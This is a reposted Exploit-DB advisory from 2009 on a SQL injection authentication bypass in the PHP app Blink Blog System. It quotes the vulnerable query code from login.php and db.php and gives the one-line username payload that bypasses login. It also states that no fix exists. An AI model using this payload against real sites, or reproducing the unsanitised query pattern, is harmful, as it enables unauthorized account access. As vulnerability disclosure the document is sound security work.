- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 9348
- Проверка EDB
-
- Пройдено
- Автор
- SALVATORE FRESTA
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- null
- Дата публикации
- 2009-08-03
Код:
******** Salvatore "drosophila" Fresta ********
[+] Application: Blink Blog System
[+] Version: Unknown
[+] Website: http://blogink.sourceforge.net
[+] Bugs: [A] Authentication Bypass
[+] Exploitation: Remote
[+] Date: 03 Aug 2009
[+] Discovered by: Salvatore Fresta aka drosophila
[+] Author: Salvatore Fresta aka drosophila
[+] E-mail: drosophilaxxx [at] gmail.com
***************************************************
[+] Menu
1) Bugs
2) Code
3) Fix
***************************************************
[+] Bugs
There are many SQL Injection flaws but I post the
only one that allows a guest to bypass the login.
- [A] Authentication Bypass
[-] Risk: medium
[-] Requisites: magic_quotes_gpc = off
[-] File affected: login.php, db.php
This bug allows a guest to bypass the login.
login.php:
...
$username = $_POST["nick"];
$password = md5($_POST["password"]);
if ($data = $DB->usercheck($username, $password))
...
db.php:
function usercheck($username, $password)
{
$try = mysql_query("SELECT * FROM users WHERE nick=\"".$username."\" AND password=\"".$password."\" ");
...
***************************************************
[+] Code
- [A] Authentication Bypass
username: root"#
password: foo
***************************************************
[+] Fix
No fix.
***************************************************
# milw0rm.com [2009-08-03]- Источник
- www.exploit-db.com
